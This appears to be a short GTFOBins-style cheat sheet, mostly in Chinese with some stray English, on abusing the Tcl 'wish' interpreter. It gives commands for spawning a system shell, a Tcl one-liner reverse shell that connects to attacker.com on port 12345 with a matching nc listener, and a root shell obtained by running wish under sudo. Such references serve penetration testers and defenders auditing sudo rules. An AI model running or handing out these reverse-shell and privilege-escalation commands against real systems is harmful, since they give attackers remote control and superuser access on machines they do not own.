用来生成一个交互式的系统shell。
wish
exec /bin/sh <@stdin >@stdout 2>@stderr
向监听端口发送一个非交互式反向shell。
在攻击者机器上运行nc -l -p 12345以接收shell。
nc -l -p 12345
on the attacker box to receive the shell. export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
sudo wish
exec /bin/sh <@stdin >@stdout 2>@stderr